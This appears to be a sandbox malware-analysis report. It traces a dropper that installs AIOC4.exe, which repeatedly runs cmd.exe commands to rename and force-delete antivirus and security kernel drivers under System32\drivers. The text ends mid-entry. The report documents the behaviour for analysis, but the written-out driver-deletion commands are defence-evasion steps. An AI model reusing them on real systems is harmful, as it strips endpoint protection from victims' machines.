PID 1356 wrote to memory of 1804	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1804	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1524	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1524	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1524	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1932	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1932	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1932	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1944	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1944	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1944	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1600	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1600	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1600	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1404	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1404	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1404	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1728	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1728	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1728	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1344	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1344	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1344	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 596	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 596	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 596	1356	AIOC4.exe	cmd.exe
PID 1356 wrote to memory of 1636	1356	AIOC4.exe	cmd.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

pid process

1572

pid	process
1572

C:\Users\Admin\AppData\Local\Temp\74161da72b92f3dc29efa72b75dcf86c.exe
"C:\Users\Admin\AppData\Local\Temp\74161da72b92f3dc29efa72b75dcf86c.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:848

C:\Program Files\AIOC4\StartNetApp.exe
"C:\Program Files\AIOC4\StartNetApp.exe"
2⤵
- Executes dropped EXE
- Sets file execution options in registry
- Loads dropped DLL
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1564

C:\ProgramData\s_a.exe
"C:\ProgramData\s_a.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1836

C:\Program Files\AIOC4\AIOC4.exe
"C:\Program Files\AIOC4\AIOC4.exe"
3⤵
- Executes dropped EXE
- Sets file execution options in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\360* 360*.remove
4⤵
PID:2000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\BAPIDRV64.sys BAPIDRV64.sys.remove
4⤵
PID:900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\360*
4⤵
PID:840

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\BAPIDRV64.sys*
4⤵
PID:1400

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\qmbsecx64.sys qmbsecx64.sys.remove
4⤵
PID:1640

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\qmbsecx64.sys*
4⤵
PID:1620

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys TAOAcceleratorEx64_ev.sys.remove
4⤵
PID:584

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys*
4⤵
PID:772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys TAOKernelEx64_ev.sys.remove
4⤵
PID:1804

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys*
4⤵
PID:1524

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TFsFltX64_ev.sys TFsFltX64_ev.sys.remove
4⤵
PID:1932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TFsFltX64_ev.sys*
4⤵
PID:1944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker_ev.sys kdhacker_ev.sys.remove
4⤵
PID:1600

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker_ev.sys*
4⤵
PID:1404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_arm.sys kdhacker64_arm.sys.remove
4⤵
PID:1728

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_arm.sys*
4⤵
PID:1344

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_ev.sys kdhacker64_ev.sys.remove
4⤵
PID:596

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_ev.sys*
4⤵
PID:1636

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksskrpr.sys ksskrpr.sys.remove
4⤵
PID:1560

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksskrpr.sys*
4⤵
PID:1596

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc_ev.sys kavbootc_ev.sys.remove
4⤵
PID:1648

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc_ev.sys*
4⤵
PID:1540

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_arm.sys kavbootc64_arm.sys.remove
4⤵
PID:1104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_arm.sys*
4⤵
PID:1784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_ev.sys kavbootc64_ev.sys.remove
4⤵
PID:992

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_ev.sys*
4⤵
PID:1352

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot.sys kisboot.sys.remove
4⤵
PID:1292

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot.sys*
4⤵
PID:1408

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot64.sys kisboot64.sys.remove
4⤵
PID:1032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot64.sys*
4⤵
PID:1048

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kiscore.sys kiscore.sys.remove
4⤵
PID:880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl.sys kisknl.sys.remove
4⤵
PID:1324

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kiscore.sys*
4⤵
PID:1840

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl.sys*
4⤵
PID:1888

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl_del.sys kisknl_del.sys.remove
4⤵
PID:1120

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl_del.sys*
4⤵
PID:2032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl64_arm.sys kisknl64_arm.sys.remove
4⤵
PID:1668

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl64_arm.sys*
4⤵
PID:1724

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt.sys kisnetflt.sys.remove
4⤵
PID:960

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt.sys*
4⤵
PID:1708

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt64_arm.sys kisnetflt64_arm.sys.remove
4⤵
PID:1044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt64_arm.sys*
4⤵
PID:1996

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm_ev.sys kisnetm_ev.sys.remove
4⤵
PID:1692

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm_ev.sys*
4⤵
PID:1876

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_arm.sys kisnetm64_arm.sys.remove
4⤵
PID:1772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_arm.sys*
4⤵
PID:688

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_ev.sys kisnetm64_ev.sys.remove
4⤵
PID:528

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_ev.sys*
4⤵
PID:1628

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetmxp.sys kisnetmxp.sys.remove
4⤵
PID:1464

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetmxp.sys*
4⤵
PID:612

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi.sys ksapi.sys.remove
4⤵
PID:1380

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi.sys*
4⤵
PID:2012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64.sys ksapi64.sys.remove
4⤵
PID:388

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64.sys*
4⤵
PID:964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64_arm.sys ksapi64_arm.sys.remove
4⤵
PID:1800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64_arm.sys*
4⤵
PID:1848

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery.sys kusbquery.sys.remove
4⤵
PID:1792

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery.sys*
4⤵
PID:1884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery64.sys kusbquery64.sys.remove
4⤵
PID:1828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery64.sys*
4⤵
PID:300

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\tfossiksy.sys tfossiksy.sys.remove
4⤵
PID:524

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\tfossiksy.sys*
4⤵
PID:664

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\2345* 2345*.remove
4⤵
PID:1556

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\2345*
4⤵
PID:1016

C:\Program Files\AIOC4\PrimaryScreen.exe
"PrimaryScreen.exe" ScaleX
4⤵
- Executes dropped EXE
PID:556

C:\Program Files\AIOC4\AIOC4.exe
"C:\Program Files\AIOC4\AIOC4.exe"
4⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
PID:1740

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\360* 360*.remove
5⤵
PID:1744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\BAPIDRV64.sys BAPIDRV64.sys.remove
5⤵
PID:1756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\360*
5⤵
PID:1324

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\BAPIDRV64.sys*
5⤵
PID:1048

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\qmbsecx64.sys qmbsecx64.sys.remove
5⤵
PID:992

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\qmbsecx64.sys*
5⤵
PID:1884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys TAOAcceleratorEx64_ev.sys.remove
5⤵
PID:1344

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys*
5⤵
PID:964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys TAOKernelEx64_ev.sys.remove
5⤵
PID:1628

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys*
5⤵
PID:1932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TFsFltX64_ev.sys TFsFltX64_ev.sys.remove
5⤵
PID:584

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TFsFltX64_ev.sys*
5⤵
PID:1120

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker_ev.sys kdhacker_ev.sys.remove
5⤵
PID:804

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker_ev.sys*
5⤵
PID:1356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_arm.sys kdhacker64_arm.sys.remove
5⤵
PID:1224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_arm.sys*
5⤵
PID:472

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_ev.sys kdhacker64_ev.sys.remove
5⤵
PID:1500

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_ev.sys*
5⤵
PID:524

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksskrpr.sys ksskrpr.sys.remove
5⤵
PID:1828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksskrpr.sys*
5⤵
PID:1596

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc_ev.sys kavbootc_ev.sys.remove
5⤵
PID:1404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc_ev.sys*
5⤵
PID:1380

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_arm.sys kavbootc64_arm.sys.remove
5⤵
PID:1996

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_arm.sys*
5⤵
PID:1524

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_ev.sys kavbootc64_ev.sys.remove
5⤵
PID:1700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_ev.sys*
5⤵
PID:1820

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot.sys kisboot.sys.remove
5⤵
PID:984

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot.sys*
5⤵
PID:1364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot64.sys kisboot64.sys.remove
5⤵
PID:676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot64.sys*
5⤵
PID:1292

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kiscore.sys kiscore.sys.remove
5⤵
PID:1560

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kiscore.sys*
5⤵
PID:1800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl.sys kisknl.sys.remove
5⤵
PID:388

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl.sys*
5⤵
PID:1944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl_del.sys kisknl_del.sys.remove
5⤵
PID:1668

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl_del.sys*
5⤵
PID:1396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl64_arm.sys kisknl64_arm.sys.remove
5⤵
PID:1212

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl64_arm.sys*
5⤵
PID:1168

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt.sys kisnetflt.sys.remove
5⤵
PID:1840

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt.sys*
5⤵
PID:880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt64_arm.sys kisnetflt64_arm.sys.remove
5⤵
PID:1648

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt64_arm.sys*
5⤵
PID:1708

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm_ev.sys kisnetm_ev.sys.remove
5⤵
PID:1692

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm_ev.sys*
5⤵
PID:1620

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_arm.sys kisnetm64_arm.sys.remove
5⤵
PID:1988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_arm.sys*
5⤵
PID:2040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_ev.sys kisnetm64_ev.sys.remove
5⤵
PID:1796

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_ev.sys*
5⤵
PID:568

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetmxp.sys kisnetmxp.sys.remove
5⤵
PID:1636

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetmxp.sys*
5⤵
PID:2012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi.sys ksapi.sys.remove
5⤵
PID:528

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi.sys*
5⤵
PID:2032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64.sys ksapi64.sys.remove
5⤵
PID:1016

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64.sys*
5⤵
PID:1860

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64_arm.sys ksapi64_arm.sys.remove
5⤵
PID:1060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64_arm.sys*
5⤵
PID:1104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery.sys kusbquery.sys.remove
5⤵
PID:2000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery.sys*
5⤵
PID:688

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery64.sys kusbquery64.sys.remove
5⤵
PID:960

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery64.sys*
5⤵
PID:1044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\tfossiksy.sys tfossiksy.sys.remove
5⤵
PID:988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\tfossiksy.sys*
5⤵
PID:1400

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\2345* 2345*.remove
5⤵
PID:772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\2345*
5⤵
PID:1464

C:\Program Files\AIOC4\PrimaryScreen.exe
"PrimaryScreen.exe" ScaleX
5⤵
- Executes dropped EXE
PID:1772

C:\Windows\system32\CMD.exe
"CMD" /C ver
5⤵
PID:1408

C:\Program Files\AIOC4\AIOC4.exe
"C:\Program Files\AIOC4\AIOC4.exe"
5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:300

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\360* 360*.remove
6⤵
PID:1616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\BAPIDRV64.sys BAPIDRV64.sys.remove
6⤵
PID:1556

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\360*
6⤵
PID:528

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\BAPIDRV64.sys*
6⤵
PID:568

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\qmbsecx64.sys qmbsecx64.sys.remove
6⤵
PID:1708

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\qmbsecx64.sys*
6⤵
PID:1756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys TAOAcceleratorEx64_ev.sys.remove
6⤵
PID:1800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOAcceleratorEx64_ev.sys*
6⤵
PID:1524

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys TAOKernelEx64_ev.sys.remove
6⤵
PID:1828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TAOKernelEx64_ev.sys*
6⤵
PID:988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\TFsFltX64_ev.sys TFsFltX64_ev.sys.remove
6⤵
PID:1060

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\TFsFltX64_ev.sys*
6⤵
PID:1572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker_ev.sys kdhacker_ev.sys.remove
6⤵
PID:1644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker_ev.sys*
6⤵
PID:556

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_arm.sys kdhacker64_arm.sys.remove
6⤵
PID:1352

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_arm.sys*
6⤵
PID:964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kdhacker64_ev.sys kdhacker64_ev.sys.remove
6⤵
PID:1692

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kdhacker64_ev.sys*
6⤵
PID:1212

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksskrpr.sys ksskrpr.sys.remove
6⤵
PID:1168

C:\Windows\System32\cmd.exe
